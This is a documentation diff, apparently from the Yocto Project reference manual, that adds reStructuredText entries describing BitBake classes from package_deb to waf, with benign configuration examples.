+The ``package_deb`` class provides support for creating packages that
+use the Debian (i.e. ``.deb``) file format. The class ensures the
+packages are written out in a ``.deb`` file format to the
+``${``\ :term:`DEPLOY_DIR_DEB`\ ``}`` directory.
+
+This class inherits the :ref:`package <ref-classes-package>` class and
+is enabled through the :term:`PACKAGE_CLASSES`
+variable in the ``local.conf`` file.
+
+.. _ref-classes-package_ipk:
+
+``package_ipk.bbclass``
+=======================
+
+The ``package_ipk`` class provides support for creating packages that
+use the IPK (i.e. ``.ipk``) file format. The class ensures the packages
+are written out in a ``.ipk`` file format to the
+``${``\ :term:`DEPLOY_DIR_IPK`\ ``}`` directory.
+
+This class inherits the :ref:`package <ref-classes-package>` class and
+is enabled through the :term:`PACKAGE_CLASSES`
+variable in the ``local.conf`` file.
+
+.. _ref-classes-package_rpm:
+
+``package_rpm.bbclass``
+=======================
+
+The ``package_rpm`` class provides support for creating packages that
+use the RPM (i.e. ``.rpm``) file format. The class ensures the packages
+are written out in a ``.rpm`` file format to the
+``${``\ :term:`DEPLOY_DIR_RPM`\ ``}`` directory.
+
+This class inherits the :ref:`package <ref-classes-package>` class and
+is enabled through the :term:`PACKAGE_CLASSES`
+variable in the ``local.conf`` file.
+
+.. _ref-classes-package_tar:
+
+``package_tar.bbclass``
+=======================
+
+The ``package_tar`` class provides support for creating tarballs. The
+class ensures the packages are written out in a tarball format to the
+``${``\ :term:`DEPLOY_DIR_TAR`\ ``}`` directory.
+
+This class inherits the :ref:`package <ref-classes-package>` class and
+is enabled through the :term:`PACKAGE_CLASSES`
+variable in the ``local.conf`` file.
+
+.. note::
+
+ You cannot specify the ``package_tar`` class first using the
+ ``PACKAGE_CLASSES`` variable. You must use ``.deb``, ``.ipk``, or ``.rpm``
+ file formats for your image or SDK.
+
+.. _ref-classes-packagedata:
+
+``packagedata.bbclass``
+=======================
+
+The ``packagedata`` class provides common functionality for reading
+``pkgdata`` files found in :term:`PKGDATA_DIR`. These
+files contain information about each output package produced by the
+OpenEmbedded build system.
+
+This class is enabled by default because it is inherited by the
+:ref:`package <ref-classes-package>` class.
+
+.. _ref-classes-packagegroup:
+
+``packagegroup.bbclass``
+========================
+
+The ``packagegroup`` class sets default values appropriate for package
+group recipes (e.g. ``PACKAGES``, ``PACKAGE_ARCH``, ``ALLOW_EMPTY``, and
+so forth). It is highly recommended that all package group recipes
+inherit this class.
+
+For information on how to use this class, see the
+":ref:`usingpoky-extend-customimage-customtasks`"
+section in the Yocto Project Development Tasks Manual.
+
+Previously, this class was called the ``task`` class.
+
+.. _ref-classes-patch:
+
+``patch.bbclass``
+=================
+
+The ``patch`` class provides all functionality for applying patches
+during the :ref:`ref-tasks-patch` task.
+
+This class is enabled by default because it is inherited by the
+:ref:`base <ref-classes-base>` class.
+
+.. _ref-classes-perlnative:
+
+``perlnative.bbclass``
+======================
+
+When inherited by a recipe, the ``perlnative`` class supports using the
+native version of Perl built by the build system rather than using the
+version provided by the build host.
+
+.. _ref-classes-pixbufcache:
+
+``pixbufcache.bbclass``
+=======================
+
+The ``pixbufcache`` class generates the proper post-install and
+post-remove (postinst/postrm) scriptlets for packages that install
+pixbuf loaders, which are used with ``gdk-pixbuf``. These scriptlets
+call ``update_pixbuf_cache`` to add the pixbuf loaders to the cache.
+Since the cache files are architecture-specific, ``update_pixbuf_cache``
+is run using QEMU if the postinst scriptlets need to be run on the build
+host during image creation.
+
+If the pixbuf loaders being installed are in packages other than the
+recipe's main package, set
+:term:`PIXBUF_PACKAGES` to specify the packages
+containing the loaders.
+
+.. _ref-classes-pkgconfig:
+
+``pkgconfig.bbclass``
+=====================
+
+The ``pkgconfig`` class provides a standard way to get header and
+library information by using ``pkg-config``. This class aims to smooth
+integration of ``pkg-config`` into libraries that use it.
+
+During staging, BitBake installs ``pkg-config`` data into the
+``sysroots/`` directory. By making use of sysroot functionality within
+``pkg-config``, the ``pkgconfig`` class no longer has to manipulate the
+files.
+
+.. _ref-classes-populate-sdk:
+
+``populate_sdk.bbclass``
+========================
+
+The ``populate_sdk`` class provides support for SDK-only recipes. For
+information on advantages gained when building a cross-development
+toolchain using the :ref:`ref-tasks-populate_sdk`
+task, see the ":ref:`sdk-manual/sdk-appendix-obtain:building an sdk installer`"
+section in the Yocto Project Application Development and the Extensible
+Software Development Kit (eSDK) manual.
+
+.. _ref-classes-populate-sdk-*:
+
+``populate_sdk_*.bbclass``
+==========================
+
+The ``populate_sdk_*`` classes support SDK creation and consist of the
+following classes:
+
+- ``populate_sdk_base``: The base class supporting SDK creation under
+ all package managers (i.e. DEB, RPM, and opkg).
+
+- ``populate_sdk_deb``: Supports creation of the SDK given the Debian
+ package manager.
+
+- ``populate_sdk_rpm``: Supports creation of the SDK given the RPM
+ package manager.
+
+- ``populate_sdk_ipk``: Supports creation of the SDK given the opkg
+ (IPK format) package manager.
+
+- ``populate_sdk_ext``: Supports extensible SDK creation under all
+ package managers.
+
+The ``populate_sdk_base`` class inherits the appropriate
+``populate_sdk_*`` (i.e. ``deb``, ``rpm``, and ``ipk``) based on
+:term:`IMAGE_PKGTYPE`.
+
+The base class ensures all source and destination directories are
+established and then populates the SDK. After populating the SDK, the
+``populate_sdk_base`` class constructs two sysroots:
+``${``\ :term:`SDK_ARCH`\ ``}-nativesdk``, which
+contains the cross-compiler and associated tooling, and the target,
+which contains a target root filesystem that is configured for the SDK
+usage. These two images reside in :term:`SDK_OUTPUT`,
+which consists of the following:
+::
+
+ ${SDK_OUTPUT}/${SDK_ARCH}-nativesdk-pkgs
+ ${SDK_OUTPUT}/${SDKTARGETSYSROOT}/target-pkgs
+
+Finally, the base populate SDK class creates the toolchain environment
+setup script, the tarball of the SDK, and the installer.
+
+The respective ``populate_sdk_deb``, ``populate_sdk_rpm``, and
+``populate_sdk_ipk`` classes each support the specific type of SDK.
+These classes are inherited by and used with the ``populate_sdk_base``
+class.
+
+For more information on the cross-development toolchain generation, see
+the ":ref:`overview-manual/overview-manual-concepts:cross-development toolchain generation`"
+section in the Yocto Project Overview and Concepts Manual. For
+information on advantages gained when building a cross-development
+toolchain using the :ref:`ref-tasks-populate_sdk`
+task, see the
+":ref:`sdk-manual/sdk-appendix-obtain:building an sdk installer`"
+section in the Yocto Project Application Development and the Extensible
+Software Development Kit (eSDK) manual.
+
+.. _ref-classes-prexport:
+
+``prexport.bbclass``
+====================
+
+The ``prexport`` class provides functionality for exporting
+:term:`PR` values.
+
+.. note::
+
+ This class is not intended to be used directly. Rather, it is enabled
+ when using "``bitbake-prserv-tool export``".
+
+.. _ref-classes-primport:
+
+``primport.bbclass``
+====================
+
+The ``primport`` class provides functionality for importing
+:term:`PR` values.
+
+.. note::
+
+ This class is not intended to be used directly. Rather, it is enabled
+ when using "``bitbake-prserv-tool import``".
+
+.. _ref-classes-prserv:
+
+``prserv.bbclass``
+==================
+
+The ``prserv`` class provides functionality for using a :ref:`PR
+service <dev-manual/dev-manual-common-tasks:working with a pr service>` in order to
+automatically manage the incrementing of the :term:`PR`
+variable for each recipe.
+
+This class is enabled by default because it is inherited by the
+:ref:`package <ref-classes-package>` class. However, the OpenEmbedded
+build system will not enable the functionality of this class unless
+:term:`PRSERV_HOST` has been set.
+
+.. _ref-classes-ptest:
+
+``ptest.bbclass``
+=================
+
+The ``ptest`` class provides functionality for packaging and installing
+runtime tests for recipes that build software that provides these tests.
+
+This class is intended to be inherited by individual recipes. However,
+the class' functionality is largely disabled unless "ptest" appears in
+:term:`DISTRO_FEATURES`. See the
+":ref:`dev-manual/dev-manual-common-tasks:testing packages with ptest`"
+section in the Yocto Project Development Tasks Manual for more information
+on ptest.
+
+.. _ref-classes-ptest-gnome:
+
+``ptest-gnome.bbclass``
+=======================
+
+Enables package tests (ptests) specifically for GNOME packages, which
+have tests intended to be executed with ``gnome-desktop-testing``.
+
+For information on setting up and running ptests, see the
+":ref:`dev-manual/dev-manual-common-tasks:testing packages with ptest`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-classes-python-dir:
+
+``python-dir.bbclass``
+======================
+
+The ``python-dir`` class provides the base version, location, and site
+package location for Python.
+
+.. _ref-classes-python3native:
+
+``python3native.bbclass``
+=========================
+
+The ``python3native`` class supports using the native version of Python
+3 built by the build system rather than support of the version provided
+by the build host.
+
+.. _ref-classes-pythonnative:
+
+``pythonnative.bbclass``
+========================
+
+When inherited by a recipe, the ``pythonnative`` class supports using
+the native version of Python built by the build system rather than using
+the version provided by the build host.
+
+.. _ref-classes-qemu:
+
+``qemu.bbclass``
+================
+
+The ``qemu`` class provides functionality for recipes that either need
+QEMU or test for the existence of QEMU. Typically, this class is used to
+run programs for a target system on the build host using QEMU's
+application emulation mode.
+
+.. _ref-classes-recipe_sanity:
+
+``recipe_sanity.bbclass``
+=========================
+
+The ``recipe_sanity`` class checks for the presence of any host system
+recipe prerequisites that might affect the build (e.g. variables that
+are set or software that is present).
+
+.. _ref-classes-relocatable:
+
+``relocatable.bbclass``
+=======================
+
+The ``relocatable`` class enables relocation of binaries when they are
+installed into the sysroot.
+
+This class makes use of the :ref:`chrpath <ref-classes-chrpath>` class
+and is used by both the :ref:`cross <ref-classes-cross>` and
+:ref:`native <ref-classes-native>` classes.
+
+.. _ref-classes-remove-libtool:
+
+``remove-libtool.bbclass``
+==========================
+
+The ``remove-libtool`` class adds a post function to the
+:ref:`ref-tasks-install` task to remove all ``.la`` files
+installed by ``libtool``. Removing these files results in them being
+absent from both the sysroot and target packages.
+
+If a recipe needs the ``.la`` files to be installed, then the recipe can
+override the removal by setting ``REMOVE_LIBTOOL_LA`` to "0" as follows:
+::
+
+ REMOVE_LIBTOOL_LA = "0"
+
+.. note::
+
+ The ``remove-libtool`` class is not enabled by default.
+
+.. _ref-classes-report-error:
+
+``report-error.bbclass``
+========================
+
+The ``report-error`` class supports enabling the :ref:`error reporting
+tool <dev-manual/dev-manual-common-tasks:using the error reporting tool>`",
+which allows you to submit build error information to a central database.
+
+The class collects debug information for recipe, recipe version, task,
+machine, distro, build system, target system, host distro, branch,
+commit, and log. From the information, report files using a JSON format
+are created and stored in
+``${``\ :term:`LOG_DIR`\ ``}/error-report``.
+
+.. _ref-classes-rm-work:
+
+``rm_work.bbclass``
+===================
+
+The ``rm_work`` class supports deletion of temporary workspace, which
+can ease your hard drive demands during builds.
+
+The OpenEmbedded build system can use a substantial amount of disk space
+during the build process. A portion of this space is the work files
+under the ``${TMPDIR}/work`` directory for each recipe. Once the build
+system generates the packages for a recipe, the work files for that
+recipe are no longer needed. However, by default, the build system
+preserves these files for inspection and possible debugging purposes. If
+you would rather have these files deleted to save disk space as the
+build progresses, you can enable ``rm_work`` by adding the following to
+your ``local.conf`` file, which is found in the :term:`Build Directory`.
+::
+
+ INHERIT += "rm_work"
+
+If you are
+modifying and building source code out of the work directory for a
+recipe, enabling ``rm_work`` will potentially result in your changes to
+the source being lost. To exclude some recipes from having their work
+directories deleted by ``rm_work``, you can add the names of the recipe
+or recipes you are working on to the ``RM_WORK_EXCLUDE`` variable, which
+can also be set in your ``local.conf`` file. Here is an example:
+::
+
+ RM_WORK_EXCLUDE += "busybox glibc"
+
+.. _ref-classes-rootfs*:
+
+``rootfs*.bbclass``
+===================
+
+The ``rootfs*`` classes support creating the root filesystem for an
+image and consist of the following classes:
+
+- The ``rootfs-postcommands`` class, which defines filesystem
+ post-processing functions for image recipes.
+
+- The ``rootfs_deb`` class, which supports creation of root filesystems
+ for images built using ``.deb`` packages.
+
+- The ``rootfs_rpm`` class, which supports creation of root filesystems
+ for images built using ``.rpm`` packages.
+
+- The ``rootfs_ipk`` class, which supports creation of root filesystems
+ for images built using ``.ipk`` packages.
+
+- The ``rootfsdebugfiles`` class, which installs additional files found
+ on the build host directly into the root filesystem.
+
+The root filesystem is created from packages using one of the
+``rootfs*.bbclass`` files as determined by the
+:term:`PACKAGE_CLASSES` variable.
+
+For information on how root filesystem images are created, see the
+":ref:`image-generation-dev-environment`"
+section in the Yocto Project Overview and Concepts Manual.
+
+.. _ref-classes-sanity:
+
+``sanity.bbclass``
+==================
+
+The ``sanity`` class checks to see if prerequisite software is present
+on the host system so that users can be notified of potential problems
+that might affect their build. The class also performs basic user
+configuration checks from the ``local.conf`` configuration file to
+prevent common mistakes that cause build failures. Distribution policy
+usually determines whether to include this class.
+
+.. _ref-classes-scons:
+
+``scons.bbclass``
+=================
+
+The ``scons`` class supports recipes that need to build software that
+uses the SCons build system. You can use the
+:term:`EXTRA_OESCONS` variable to specify
+additional configuration options you want to pass SCons command line.
+
+.. _ref-classes-sdl:
+
+``sdl.bbclass``
+===============
+
+The ``sdl`` class supports recipes that need to build software that uses
+the Simple DirectMedia Layer (SDL) library.
+
+.. _ref-classes-setuptools:
+
+``setuptools.bbclass``
+======================
+
+The ``setuptools`` class supports Python version 2.x extensions that use
+build systems based on ``setuptools``. If your recipe uses these build
+systems, the recipe needs to inherit the ``setuptools`` class.
+
+.. _ref-classes-setuptools3:
+
+``setuptools3.bbclass``
+=======================
+
+The ``setuptools3`` class supports Python version 3.x extensions that
+use build systems based on ``setuptools3``. If your recipe uses these
+build systems, the recipe needs to inherit the ``setuptools3`` class.
+
+.. _ref-classes-sign_rpm:
+
+``sign_rpm.bbclass``
+====================
+
+The ``sign_rpm`` class supports generating signed RPM packages.
+
+.. _ref-classes-sip:
+
+``sip.bbclass``
+===============
+
+The ``sip`` class supports recipes that build or package SIP-based
+Python bindings.
+
+.. _ref-classes-siteconfig:
+
+``siteconfig.bbclass``
+======================
+
+The ``siteconfig`` class provides functionality for handling site
+configuration. The class is used by the
+:ref:`autotools <ref-classes-autotools>` class to accelerate the
+:ref:`ref-tasks-configure` task.
+
+.. _ref-classes-siteinfo:
+
+``siteinfo.bbclass``
+====================
+
+The ``siteinfo`` class provides information about the targets that might
+be needed by other classes or recipes.
+
+As an example, consider Autotools, which can require tests that must
+execute on the target hardware. Since this is not possible in general
+when cross compiling, site information is used to provide cached test
+results so these tests can be skipped over but still make the correct
+values available. The ``meta/site directory`` contains test results
+sorted into different categories such as architecture, endianness, and
+the ``libc`` used. Site information provides a list of files containing
+data relevant to the current build in the ``CONFIG_SITE`` variable that
+Autotools automatically picks up.
+
+The class also provides variables like ``SITEINFO_ENDIANNESS`` and
+``SITEINFO_BITS`` that can be used elsewhere in the metadata.
+
+.. _ref-classes-spdx:
+
+``spdx.bbclass``
+================
+
+The ``spdx`` class integrates real-time license scanning, generation of
+SPDX standard output, and verification of license information during the
+build.
+
+.. note::
+
+ This class is currently at the prototype stage in the 1.6 release.
+
+.. _ref-classes-sstate:
+
+``sstate.bbclass``
+==================
+
+The ``sstate`` class provides support for Shared State (sstate). By
+default, the class is enabled through the
+:term:`INHERIT_DISTRO` variable's default value.
+
+For more information on sstate, see the
+":ref:`overview-manual/overview-manual-concepts:shared state cache`"
+section in the Yocto Project Overview and Concepts Manual.
+
+.. _ref-classes-staging:
+
+``staging.bbclass``
+===================
+
+The ``staging`` class installs files into individual recipe work
+directories for sysroots. The class contains the following key tasks:
+
+- The :ref:`ref-tasks-populate_sysroot` task,
+ which is responsible for handing the files that end up in the recipe
+ sysroots.
+
+- The
+ :ref:`ref-tasks-prepare_recipe_sysroot`
+ task (a "partner" task to the ``populate_sysroot`` task), which
+ installs the files into the individual recipe work directories (i.e.
+ :term:`WORKDIR`).
+
+The code in the ``staging`` class is complex and basically works in two
+stages:
+
+- *Stage One:* The first stage addresses recipes that have files they
+ want to share with other recipes that have dependencies on the
+ originating recipe. Normally these dependencies are installed through
+ the :ref:`ref-tasks-install` task into
+ ``${``\ :term:`D`\ ``}``. The ``do_populate_sysroot`` task
+ copies a subset of these files into ``${SYSROOT_DESTDIR}``. This
+ subset of files is controlled by the
+ :term:`SYSROOT_DIRS`,
+ :term:`SYSROOT_DIRS_NATIVE`, and
+ :term:`SYSROOT_DIRS_BLACKLIST`
+ variables.
+
+ .. note::
+
+ Additionally, a recipe can customize the files further by
+ declaring a processing function in the ``SYSROOT_PREPROCESS_FUNCS``
+ variable.
+
+ A shared state (sstate) object is built from these files and the
+ files are placed into a subdirectory of
+ :ref:`structure-build-tmp-sysroots-components`.
+ The files are scanned for hardcoded paths to the original
+ installation location. If the location is found in text files, the
+ hardcoded locations are replaced by tokens and a list of the files
+ needing such replacements is created. These adjustments are referred
+ to as "FIXMEs". The list of files that are scanned for paths is
+ controlled by the :term:`SSTATE_SCAN_FILES`
+ variable.
+
+- *Stage Two:* The second stage addresses recipes that want to use
+ something from another recipe and declare a dependency on that recipe
+ through the :term:`DEPENDS` variable. The recipe will
+ have a
+ :ref:`ref-tasks-prepare_recipe_sysroot`
+ task and when this task executes, it creates the ``recipe-sysroot``
+ and ``recipe-sysroot-native`` in the recipe work directory (i.e.
+ :term:`WORKDIR`). The OpenEmbedded build system
+ creates hard links to copies of the relevant files from
+ ``sysroots-components`` into the recipe work directory.
+
+ .. note::
+
+ If hard links are not possible, the build system uses actual
+ copies.
+
+ The build system then addresses any "FIXMEs" to paths as defined from
+ the list created in the first stage.
+
+ Finally, any files in ``${bindir}`` within the sysroot that have the
+ prefix "``postinst-``" are executed.
+
+ .. note::
+
+ Although such sysroot post installation scripts are not
+ recommended for general use, the files do allow some issues such
+ as user creation and module indexes to be addressed.
+
+ Because recipes can have other dependencies outside of ``DEPENDS``
+ (e.g. ``do_unpack[depends] += "tar-native:do_populate_sysroot"``),
+ the sysroot creation function ``extend_recipe_sysroot`` is also added
+ as a pre-function for those tasks whose dependencies are not through
+ ``DEPENDS`` but operate similarly.
+
+ When installing dependencies into the sysroot, the code traverses the
+ dependency graph and processes dependencies in exactly the same way
+ as the dependencies would or would not be when installed from sstate.
+ This processing means, for example, a native tool would have its
+ native dependencies added but a target library would not have its
+ dependencies traversed or installed. The same sstate dependency code
+ is used so that builds should be identical regardless of whether
+ sstate was used or not. For a closer look, see the
+ ``setscene_depvalid()`` function in the
+ :ref:`sstate <ref-classes-sstate>` class.
+
+ The build system is careful to maintain manifests of the files it
+ installs so that any given dependency can be installed as needed. The
+ sstate hash of the installed item is also stored so that if it
+ changes, the build system can reinstall it.
+
+.. _ref-classes-syslinux:
+
+``syslinux.bbclass``
+====================
+
+The ``syslinux`` class provides syslinux-specific functions for building
+bootable images.
+
+The class supports the following variables:
+
+- :term:`INITRD`: Indicates list of filesystem images to
+ concatenate and use as an initial RAM disk (initrd). This variable is
+ optional.
+
+- :term:`ROOTFS`: Indicates a filesystem image to include
+ as the root filesystem. This variable is optional.
+
+- :term:`AUTO_SYSLINUXMENU`: Enables creating
+ an automatic menu when set to "1".
+
+- :term:`LABELS`: Lists targets for automatic
+ configuration.
+
+- :term:`APPEND`: Lists append string overrides for each
+ label.
+
+- :term:`SYSLINUX_OPTS`: Lists additional options
+ to add to the syslinux file. Semicolon characters separate multiple
+ options.
+
+- :term:`SYSLINUX_SPLASH`: Lists a background
+ for the VGA boot menu when you are using the boot menu.
+
+- :term:`SYSLINUX_DEFAULT_CONSOLE`: Set
+ to "console=ttyX" to change kernel boot default console.
+
+- :term:`SYSLINUX_SERIAL`: Sets an alternate
+ serial port. Or, turns off serial when the variable is set with an
+ empty string.
+
+- :term:`SYSLINUX_SERIAL_TTY`: Sets an
+ alternate "console=tty..." kernel boot argument.
+
+.. _ref-classes-systemd:
+
+``systemd.bbclass``
+===================
+
+The ``systemd`` class provides support for recipes that install systemd
+unit files.
+
+The functionality for this class is disabled unless you have "systemd"
+in :term:`DISTRO_FEATURES`.
+
+Under this class, the recipe or Makefile (i.e. whatever the recipe is
+calling during the :ref:`ref-tasks-install` task)
+installs unit files into
+``${``\ :term:`D`\ ``}${systemd_unitdir}/system``. If the unit
+files being installed go into packages other than the main package, you
+need to set :term:`SYSTEMD_PACKAGES` in your
+recipe to identify the packages in which the files will be installed.
+
+You should set :term:`SYSTEMD_SERVICE` to the
+name of the service file. You should also use a package name override to
+indicate the package to which the value applies. If the value applies to
+the recipe's main package, use ``${``\ :term:`PN`\ ``}``. Here
+is an example from the connman recipe:
+::
+
+ SYSTEMD_SERVICE_${PN} = "connman.service"
+
+Services are set up to start on boot automatically
+unless you have set
+:term:`SYSTEMD_AUTO_ENABLE` to "disable".
+
+For more information on ``systemd``, see the
+":ref:`dev-manual/dev-manual-common-tasks:selecting an initialization manager`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-classes-systemd-boot:
+
+``systemd-boot.bbclass``
+========================
+
+The ``systemd-boot`` class provides functions specific to the
+systemd-boot bootloader for building bootable images. This is an
+internal class and is not intended to be used directly.
+
+.. note::
+
+ The ``systemd-boot`` class is a result from merging the ``gummiboot`` class
+ used in previous Yocto Project releases with the ``systemd`` project.
+
+Set the :term:`EFI_PROVIDER` variable to
+"systemd-boot" to use this class. Doing so creates a standalone EFI
+bootloader that is not dependent on systemd.
+
+For information on more variables used and supported in this class, see
+the :term:`SYSTEMD_BOOT_CFG`,
+:term:`SYSTEMD_BOOT_ENTRIES`, and
+:term:`SYSTEMD_BOOT_TIMEOUT` variables.
+
+You can also see the `Systemd-boot
+documentation <http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/>`__
+for more information.
+
+.. _ref-classes-terminal:
+
+``terminal.bbclass``
+====================
+
+The ``terminal`` class provides support for starting a terminal session.
+The :term:`OE_TERMINAL` variable controls which
+terminal emulator is used for the session.
+
+Other classes use the ``terminal`` class anywhere a separate terminal
+session needs to be started. For example, the
+:ref:`patch <ref-classes-patch>` class assuming
+:term:`PATCHRESOLVE` is set to "user", the
+:ref:`cml1 <ref-classes-cml1>` class, and the
+:ref:`devshell <ref-classes-devshell>` class all use the ``terminal``
+class.
+
+.. _ref-classes-testimage*:
+
+``testimage*.bbclass``
+======================
+
+The ``testimage*`` classes support running automated tests against
+images using QEMU and on actual hardware. The classes handle loading the
+tests and starting the image. To use the classes, you need to perform
+steps to set up the environment.
+
+.. note::
+
+ Best practices include using :term:`IMAGE_CLASSES` rather than
+ :term:`INHERIT` to inherit the ``testimage`` class for automated image
+ testing.
+
+The tests are commands that run on the target system over ``ssh``. Each
+test is written in Python and makes use of the ``unittest`` module.
+
+The ``testimage.bbclass`` runs tests on an image when called using the
+following:
+::
+
+ $ bitbake -c testimage image
+
+The ``testimage-auto`` class
+runs tests on an image after the image is constructed (i.e.
+:term:`TESTIMAGE_AUTO` must be set to "1").
+
+For information on how to enable, run, and create new tests, see the
+":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-classes-testsdk:
+
+``testsdk.bbclass``
+===================
+
+This class supports running automated tests against software development
+kits (SDKs). The ``testsdk`` class runs tests on an SDK when called
+using the following:
+::
+
+ $ bitbake -c testsdk image
+
+.. note::
+
+ Best practices include using :term:`IMAGE_CLASSES` rather than
+ :term:`INHERIT` to inherit the ``testsdk`` class for automated SDK
+ testing.
+
+.. _ref-classes-texinfo:
+
+``texinfo.bbclass``
+===================
+
+This class should be inherited by recipes whose upstream packages invoke
+the ``texinfo`` utilities at build-time. Native and cross recipes are
+made to use the dummy scripts provided by ``texinfo-dummy-native``, for
+improved performance. Target architecture recipes use the genuine
+Texinfo utilities. By default, they use the Texinfo utilities on the
+host system.
+
+.. note::
+
+ If you want to use the Texinfo recipe shipped with the build system,
+ you can remove "texinfo-native" from :term:`ASSUME_PROVIDED` and makeinfo
+ from :term:`SANITY_REQUIRED_UTILITIES`.
+
+.. _ref-classes-toaster:
+
+``toaster.bbclass``
+===================
+
+The ``toaster`` class collects information about packages and images and
+sends them as events that the BitBake user interface can receive. The
+class is enabled when the Toaster user interface is running.
+
+This class is not intended to be used directly.
+
+.. _ref-classes-toolchain-scripts:
+
+``toolchain-scripts.bbclass``
+=============================
+
+The ``toolchain-scripts`` class provides the scripts used for setting up
+the environment for installed SDKs.
+
+.. _ref-classes-typecheck:
+
+``typecheck.bbclass``
+=====================
+
+The ``typecheck`` class provides support for validating the values of
+variables set at the configuration level against their defined types.
+The OpenEmbedded build system allows you to define the type of a
+variable using the "type" varflag. Here is an example:
+::
+
+ IMAGE_FEATURES[type] = "list"
+
+.. _ref-classes-uboot-config:
+
+``uboot-config.bbclass``
+========================
+
+The ``uboot-config`` class provides support for U-Boot configuration for
+a machine. Specify the machine in your recipe as follows:
+::
+
+ UBOOT_CONFIG ??= <default>
+ UBOOT_CONFIG[foo] = "config,images"
+
+You can also specify the machine using this method:
+::
+
+ UBOOT_MACHINE = "config"
+
+See the :term:`UBOOT_CONFIG` and :term:`UBOOT_MACHINE` variables for additional
+information.
+
+.. _ref-classes-uninative:
+
+``uninative.bbclass``
+=====================
+
+Attempts to isolate the build system from the host distribution's C
+library in order to make re-use of native shared state artifacts across
+different host distributions practical. With this class enabled, a
+tarball containing a pre-built C library is downloaded at the start of
+the build. In the Poky reference distribution this is enabled by default
+through ``meta/conf/distro/include/yocto-uninative.inc``. Other
+distributions that do not derive from poky can also
+"``require conf/distro/include/yocto-uninative.inc``" to use this.
+Alternatively if you prefer, you can build the uninative-tarball recipe
+yourself, publish the resulting tarball (e.g. via HTTP) and set
+``UNINATIVE_URL`` and ``UNINATIVE_CHECKSUM`` appropriately. For an
+example, see the ``meta/conf/distro/include/yocto-uninative.inc``.
+
+The ``uninative`` class is also used unconditionally by the extensible
+SDK. When building the extensible SDK, ``uninative-tarball`` is built
+and the resulting tarball is included within the SDK.
+
+.. _ref-classes-update-alternatives:
+
+``update-alternatives.bbclass``
+===============================
+
+The ``update-alternatives`` class helps the alternatives system when
+multiple sources provide the same command. This situation occurs when
+several programs that have the same or similar function are installed
+with the same name. For example, the ``ar`` command is available from
+the ``busybox``, ``binutils`` and ``elfutils`` packages. The
+``update-alternatives`` class handles renaming the binaries so that
+multiple packages can be installed without conflicts. The ``ar`` command
+still works regardless of which packages are installed or subsequently
+removed. The class renames the conflicting binary in each package and
+symlinks the highest priority binary during installation or removal of
+packages.
+
+To use this class, you need to define a number of variables:
+
+- :term:`ALTERNATIVE`
+
+- :term:`ALTERNATIVE_LINK_NAME`
+
+- :term:`ALTERNATIVE_TARGET`
+
+- :term:`ALTERNATIVE_PRIORITY`
+
+These variables list alternative commands needed by a package, provide
+pathnames for links, default links for targets, and so forth. For
+details on how to use this class, see the comments in the
+:yocto_git:`update-alternatives.bbclass </cgit/cgit.cgi/poky/tree/meta/classes/update-alternatives.bbclass>`
+file.
+
+.. note::
+
+ You can use the ``update-alternatives`` command directly in your recipes.
+ However, this class simplifies things in most cases.
+
+.. _ref-classes-update-rc.d:
+
+``update-rc.d.bbclass``
+=======================
+
+The ``update-rc.d`` class uses ``update-rc.d`` to safely install an
+initialization script on behalf of the package. The OpenEmbedded build
+system takes care of details such as making sure the script is stopped
+before a package is removed and started when the package is installed.
+
+Three variables control this class: ``INITSCRIPT_PACKAGES``,
+``INITSCRIPT_NAME`` and ``INITSCRIPT_PARAMS``. See the variable links
+for details.
+
+.. _ref-classes-useradd:
+
+``useradd*.bbclass``
+====================
+
+The ``useradd*`` classes support the addition of users or groups for
+usage by the package on the target. For example, if you have packages
+that contain system services that should be run under their own user or
+group, you can use these classes to enable creation of the user or
+group. The ``meta-skeleton/recipes-skeleton/useradd/useradd-example.bb``
+recipe in the :term:`Source Directory` provides a simple
+example that shows how to add three users and groups to two packages.
+See the ``useradd-example.bb`` recipe for more information on how to use
+these classes.
+
+The ``useradd_base`` class provides basic functionality for user or
+groups settings.
+
+The ``useradd*`` classes support the
+:term:`USERADD_PACKAGES`,
+:term:`USERADD_PARAM`,
+:term:`GROUPADD_PARAM`, and
+:term:`GROUPMEMS_PARAM` variables.
+
+The ``useradd-staticids`` class supports the addition of users or groups
+that have static user identification (``uid``) and group identification
+(``gid``) values.
+
+The default behavior of the OpenEmbedded build system for assigning
+``uid`` and ``gid`` values when packages add users and groups during
+package install time is to add them dynamically. This works fine for
+programs that do not care what the values of the resulting users and
+groups become. In these cases, the order of the installation determines
+the final ``uid`` and ``gid`` values. However, if non-deterministic
+``uid`` and ``gid`` values are a problem, you can override the default,
+dynamic application of these values by setting static values. When you
+set static values, the OpenEmbedded build system looks in
+:term:`BBPATH` for ``files/passwd`` and ``files/group``
+files for the values.
+
+To use static ``uid`` and ``gid`` values, you need to set some
+variables. See the :term:`USERADDEXTENSION`,
+:term:`USERADD_UID_TABLES`,
+:term:`USERADD_GID_TABLES`, and
+:term:`USERADD_ERROR_DYNAMIC` variables.
+You can also see the :ref:`useradd <ref-classes-useradd>` class for
+additional information.
+
+.. note::
+
+ You do not use the ``useradd-staticids`` class directly. You either enable
+ or disable the class by setting the ``USERADDEXTENSION`` variable. If you
+ enable or disable the class in a configured system, :term:`TMPDIR` might
+ contain incorrect ``uid`` and ``gid`` values. Deleting the ``TMPDIR``
+ directory will correct this condition.
+
+.. _ref-classes-utility-tasks:
+
+``utility-tasks.bbclass``
+=========================
+
+The ``utility-tasks`` class provides support for various "utility" type
+tasks that are applicable to all recipes, such as
+:ref:`ref-tasks-clean` and
+:ref:`ref-tasks-listtasks`.
+
+This class is enabled by default because it is inherited by the
+:ref:`base <ref-classes-base>` class.
+
+.. _ref-classes-utils:
+
+``utils.bbclass``
+=================
+
+The ``utils`` class provides some useful Python functions that are
+typically used in inline Python expressions (e.g. ``${@...}``). One
+example use is for ``bb.utils.contains()``.
+
+This class is enabled by default because it is inherited by the
+:ref:`base <ref-classes-base>` class.
+
+.. _ref-classes-vala:
+
+``vala.bbclass``
+================
+
+The ``vala`` class supports recipes that need to build software written
+using the Vala programming language.
+
+.. _ref-classes-waf:
+
+``waf.bbclass``
+===============
+
+The ``waf`` class supports recipes that need to build software that uses
+the Waf build system. You can use the
+:term:`EXTRA_OECONF` or
+:term:`PACKAGECONFIG_CONFARGS` variables
+to specify additional configuration options to be passed on the Waf
+command line.
